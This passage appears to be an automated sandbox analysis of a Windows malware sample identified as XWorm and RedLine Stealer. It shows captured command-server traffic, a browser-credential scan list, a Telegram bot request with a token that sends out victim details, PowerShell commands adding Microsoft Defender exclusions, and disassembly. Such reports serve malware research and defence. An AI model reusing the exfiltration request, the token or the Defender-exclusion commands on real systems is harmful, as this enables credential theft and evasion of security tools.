                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449737147.185.221.2093366528C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jul 16, 2024 21:07:11.119765043 CEST229OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 856137
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Jul 16, 2024 21:07:13.523264885 CEST294INHTTP/1.1 200 OK
                                                                                Content-Length: 147
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:13 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.449738147.185.221.2093366528C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jul 16, 2024 21:07:13.532079935 CEST249OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 856129
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Jul 16, 2024 21:07:14.649275064 CEST408INHTTP/1.1 200 OK
                                                                                Content-Length: 261
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:14 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449745149.154.167.2204436564C:\Users\user\AppData\Local\Temp\YsrQekGS.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-16 19:07:27 UTC449OUTGET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2024-07-16 19:07:27 UTC388INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 16 Jul 2024 19:07:27 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 464
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2024-07-16 19:07:27 UTC464INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 37 33 36 30 37 36 32 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 65 6e 65 72 61 6c 70 61 67 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 65 6e 65 72 61 6c 70 61 67 65 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 36 37 38 34 31 31 37 30 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 65 6e 74 72 69 63 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 65 64 61 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 53 4b 49 52 45 44 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 31 35 36 38 34
                                                                                Data Ascii: {"ok":true,"result":{"message_id":703,"from":{"id":6973607627,"is_bot":true,"first_name":"Generalpage","username":"Generalpage_bot"},"chat":{"id":6678411703,"first_name":"Centric","last_name":"Pedal","username":"OSKIRED","type":"private"},"date":172115684


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:15:06:58
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Ekpb7jn7mf.exe"
                                                                                Imagebase:0x400000
                                                                                File size:289'471 bytes
                                                                                MD5 hash:4CE2C0836C46C61B588972B56A23D5E2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe"
                                                                                Imagebase:0x7ff630ce0000
                                                                                File size:27'648 bytes
                                                                                MD5 hash:DEAD69D07BC33B762ABD466FB6F53E11
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe"
                                                                                Imagebase:0x900000
                                                                                File size:97'792 bytes
                                                                                MD5 hash:EAB323FA6C66098BE1068FEF0A03BFF2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: unknown
                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 96%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\YsrQekGS.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
                                                                                Imagebase:0x4b0000
                                                                                File size:42'496 bytes
                                                                                MD5 hash:6EA393666ED89F758B30EA5037F5C22A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 92%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:6
                                                                                Start time:15:07:00
                                                                                Start date:16/07/2024
                                                                                Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                                                                                Imagebase:0x7ff625650000
                                                                                File size:4'099'584 bytes
                                                                                MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:10
                                                                                Start time:15:07:03
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:11
                                                                                Start time:15:07:03
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:13
                                                                                Start time:15:07:10
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:14
                                                                                Start time:15:07:10
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:12.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:4.2%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:36
                                                                                  execution_graph 22686 41de40 22688 41de48 __close 22686->22688 22689 41ea3a 22686->22689 22690 41ea46 __close 22689->22690 22691 41e764 __getptd 67 API calls 22690->22691 22692 41ea4b 22691->22692 22695 423d39 22692->22695 22694 41ea6d __close 22694->22688 22696 423d5f 22695->22696 22697 423d58 22695->22697 22707 4252ea 22696->22707 22699 42154d __NMSG_WRITE 67 API calls 22697->22699 22699->22696 22702 423e48 22731 4214cb 22702->22731 22703 423d70 _memset 22703->22702 22705 423e08 SetUnhandledExceptionFilter UnhandledExceptionFilter 22703->22705 22705->22702 22708 41e518 __decode_pointer 6 API calls 22707->22708 22709 423d65 22708->22709 22709->22703 22710 4252f7 22709->22710 22712 425303 __close 22710->22712 22711 42535f 22714 425340 22711->22714 22716 42536e 22711->22716 22712->22711 22713 42532a 22712->22713 22712->22714 22719 425326 22712->22719 22715 41e6eb __getptd_noexit 67 API calls 22713->22715 22717 41e518 __decode_pointer 6 API calls 22714->22717 22723 42532f _siglookup 22715->22723 22718 41eb5e __free_osfhnd 67 API calls 22716->22718 22717->22723 22720 425373 22718->22720 22719->22713 22719->22716 22721 41feb3 __close 6 API calls 22720->22721 22730 425338 __close 22721->22730 22722 4253d5 22725 41ed53 __lock 67 API calls 22722->22725 22726 4253e0 22722->22726 22723->22722 22724 4214cb _raise 67 API calls 22723->22724 22723->22730 22724->22722 22725->22726 22727 41e50f _raise 6 API calls 22726->22727 22728 425415 22726->22728 22727->22728 22734 42546b 22728->22734 22730->22703 22732 421389 _doexit 67 API calls 22731->22732 22733 4214dc RtlUnwind 22732->22733 22733->22694 22735 425471 22734->22735 22736 425478 22734->22736 22738 41ec79 LeaveCriticalSection 22735->22738 22736->22730 22738->22736 18717 4296e0 18722 40550a 18717->18722 18723 405514 __EH_prolog 18722->18723 18741 409f46 18723->18741 18728 410b38 67 API calls 18729 40553e 18728->18729 18730 410b38 67 API calls 18729->18730 18731 40554d 18730->18731 18732 410b38 67 API calls 18731->18732 18733 40555c 18732->18733 18734 410b38 67 API calls 18733->18734 18735 40556b 18734->18735 18750 40538f 18735->18750 18742 409f50 __EH_prolog 18741->18742 18763 40cf98 18742->18763 18747 410b38 18902 410aaa 18747->18902 18751 409ea5 2 API calls 18750->18751 18752 405397 18751->18752 18753 410aaa 67 API calls 18752->18753 18754 4053c4 18753->18754 18755 410aaa 67 API calls 18754->18755 18756 4053cf 18755->18756 18757 410aaa 67 API calls 18756->18757 18758 4053da 18757->18758 18759 410aaa 67 API calls 18758->18759 18760 4053e5 18759->18760 18761 410aaa 67 API calls 18760->18761 18762 4053f0 18761->18762 18770 40cee5 18763->18770 18765 409f62 18766 409ea5 18765->18766 18767 409eb5 _memset 18766->18767 18897 410cde 18767->18897 18771 40cef4 _memset 18770->18771 18772 40cf0b _wcslen 18770->18772 18771->18765 18774 40ce6b 18772->18774 18775 40ce7c _realloc 18774->18775 18778 40cda7 18775->18778 18779 40cdc0 18778->18779 18780 40cdb6 18778->18780 18782 40ce2e GetCurrentProcessId 18779->18782 18783 40cde3 18779->18783 18788 40cd68 18780->18788 18787 40ce10 18782->18787 18783->18787 18792 4063ad 18783->18792 18785 40cdfe __init_pointers 18797 406353 18785->18797 18787->18771 18789 40cd71 LoadLibraryW 18788->18789 18790 40cda1 18788->18790 18789->18790 18791 40cd82 GetProcAddress GetProcAddress 18789->18791 18790->18779 18791->18790 18801 41a767 18792->18801 18799 4062f5 18797->18799 18798 406321 18798->18787 18799->18798 18894 41c52f 18799->18894 18807 41a66f 18801->18807 18804 4012d0 18849 41147f 18804->18849 18806 4012f5 18806->18785 18808 41a69f 18807->18808 18809 41a67f 18807->18809 18812 41a6af 18808->18812 18817 41a6cf 18808->18817 18822 41eb5e 18809->18822 18814 41eb5e __free_osfhnd 67 API calls 18812->18814 18815 41a6b4 18814->18815 18816 41feb3 __close 6 API calls 18815->18816 18820 4063d0 18816->18820 18818 41a716 18817->18818 18817->18820 18828 41fc18 18817->18828 18818->18820 18821 41fc18 __flsbuf 101 API calls 18818->18821 18820->18804 18821->18820 18823 41e6eb __getptd_noexit 67 API calls 18822->18823 18824 41a684 18823->18824 18825 41feb3 18824->18825 18826 41e518 __decode_pointer 6 API calls 18825->18826 18827 41fec3 __invoke_watson 18826->18827 18829 424ba7 __fileno 67 API calls 18828->18829 18830 41fc28 18829->18830 18831 41fc33 18830->18831 18832 41fc4a 18830->18832 18833 41eb5e __free_osfhnd 67 API calls 18831->18833 18834 41fc4e 18832->18834 18843 41fc5b __flswbuf 18832->18843 18842 41fc38 18833->18842 18835 41eb5e __free_osfhnd 67 API calls 18834->18835 18835->18842 18836 41fcbc 18837 41fd4b 18836->18837 18838 41fccb 18836->18838 18839 424a1e __locking 101 API calls 18837->18839 18840 41fce2 18838->18840 18845 41fcff 18838->18845 18839->18842 18841 424a1e __locking 101 API calls 18840->18841 18841->18842 18842->18818 18843->18836 18843->18842 18844 424b43 __flswbuf 67 API calls 18843->18844 18846 41fcb1 18843->18846 18844->18846 18845->18842 18847 4241d2 __lseeki64 71 API calls 18845->18847 18846->18836 18848 424afa __getbuf 67 API calls 18846->18848 18847->18842 18848->18836 18850 4114db 18849->18850 18851 41148e 18849->18851 18850->18806 18851->18850 18852 411524 18851->18852 18854 4114fd 18851->18854 18856 411507 18851->18856 18857 4114e0 18851->18857 18858 411550 18851->18858 18859 4114d4 18851->18859 18861 41158d 18851->18861 18865 4114b3 18851->18865 18860 40c271 ctype 104 API calls 18852->18860 18853 40c271 ctype 104 API calls 18855 41150e 18853->18855 18854->18850 18854->18853 18863 40e133 ctype 116 API calls 18855->18863 18867 40c271 ctype 104 API calls 18856->18867 18887 40c271 18857->18887 18862 40c271 ctype 104 API calls 18858->18862 18882 40d25c 18859->18882 18860->18865 18861->18850 18861->18854 18861->18856 18861->18857 18866 411560 18862->18866 18863->18850 18873 40e133 18865->18873 18870 40e133 ctype 116 API calls 18866->18870 18867->18855 18872 411568 18870->18872 18872->18806 18874 40e13c 18873->18874 18880 40e184 18873->18880 18875 40e146 GetLastError 18874->18875 18874->18880 18876 41a767 __vswprintf_c_l 101 API calls 18875->18876 18877 40e16b 18876->18877 18878 40d25c ctype 13 API calls 18877->18878 18879 40e176 18878->18879 18879->18880 18881 40e17d SetLastError 18879->18881 18880->18806 18881->18880 18883 40d269 __write_nolock 18882->18883 18884 40d296 18883->18884 18885 40d276 wvsprintfW 18883->18885 18884->18850 18886 40d148 ctype 12 API calls 18885->18886 18886->18884 18888 40c281 ctype 18887->18888 18889 40c2b6 LoadStringW 18888->18889 18890 40c2c8 LoadStringW 18888->18890 18889->18890 18891 40c2d6 18889->18891 18890->18891 18892 40bdcf ctype 102 API calls 18891->18892 18893 40c2e4 18892->18893 18893->18865 18895 41c564 RaiseException 18894->18895 18896 41c558 18894->18896 18895->18798 18896->18895 18900 410ca7 GetCurrentProcess GetProcessAffinityMask 18897->18900 18901 405520 18900->18901 18901->18747 18905 41275c 18902->18905 18906 412765 18905->18906 18907 40552f 18905->18907 18909 41a27a 18906->18909 18907->18728 18911 41a286 __close 18909->18911 18910 41a2ff __close _realloc 18910->18907 18911->18910 18921 41a2c5 18911->18921 18922 41ed53 18911->18922 18912 41a2da RtlFreeHeap 18912->18910 18914 41a2ec 18912->18914 18915 41eb5e __free_osfhnd 65 API calls 18914->18915 18916 41a2f1 GetLastError 18915->18916 18916->18910 18917 41a29d ___sbh_find_block 18918 41a2b7 18917->18918 18929 41edb6 18917->18929 18936 41a2d0 18918->18936 18921->18910 18921->18912 18923 41ed68 18922->18923 18924 41ed7b EnterCriticalSection 18922->18924 18939 41ec90 18923->18939 18924->18917 18926 41ed6e 18926->18924 18965 421245 18926->18965 18930 41edf5 18929->18930 18935 41f097 18929->18935 18931 41efe1 VirtualFree 18930->18931 18930->18935 18932 41f045 18931->18932 18933 41f054 VirtualFree HeapFree 18932->18933 18932->18935 19165 41c900 18933->19165 18935->18918 19169 41ec79 LeaveCriticalSection 18936->19169 18938 41a2d7 18938->18921 18940 41ec9c __close 18939->18940 18952 41ecc2 18940->18952 18972 4216f8 18940->18972 18944 41ecdd 18946 41ecf3 18944->18946 18947 41ece4 18944->18947 18950 41ed53 __lock 67 API calls 18946->18950 18949 41eb5e __free_osfhnd 67 API calls 18947->18949 18948 41ecb8 19015 421299 18948->19015 18953 41ecd2 __close 18949->18953 18954 41ecfa 18950->18954 18952->18953 19018 421093 18952->19018 18953->18926 18955 41ed02 18954->18955 18956 41ed2e 18954->18956 19023 423f96 18955->19023 18957 41a27a _realloc 67 API calls 18956->18957 18959 41ed1f 18957->18959 19027 41ed4a 18959->19027 18960 41ed0d 18960->18959 18961 41a27a _realloc 67 API calls 18960->18961 18963 41ed19 18961->18963 18964 41eb5e __free_osfhnd 67 API calls 18963->18964 18964->18959 18966 4216f8 __FF_MSGBANNER 67 API calls 18965->18966 18967 42124f 18966->18967 18968 42154d __NMSG_WRITE 67 API calls 18967->18968 18969 421257 18968->18969 18970 41e518 __decode_pointer 6 API calls 18969->18970 18971 41ed7a 18970->18971 18971->18924 19030 425757 18972->19030 18974 4216ff 18975 42170c 18974->18975 18977 425757 __set_error_mode 67 API calls 18974->18977 18976 42154d __NMSG_WRITE 67 API calls 18975->18976 18979 41ecb1 18975->18979 18978 421724 18976->18978 18977->18975 18980 42154d __NMSG_WRITE 67 API calls 18978->18980 18981 42154d 18979->18981 18980->18979 18982 421561 18981->18982 18983 425757 __set_error_mode 64 API calls 18982->18983 19014 4216bc 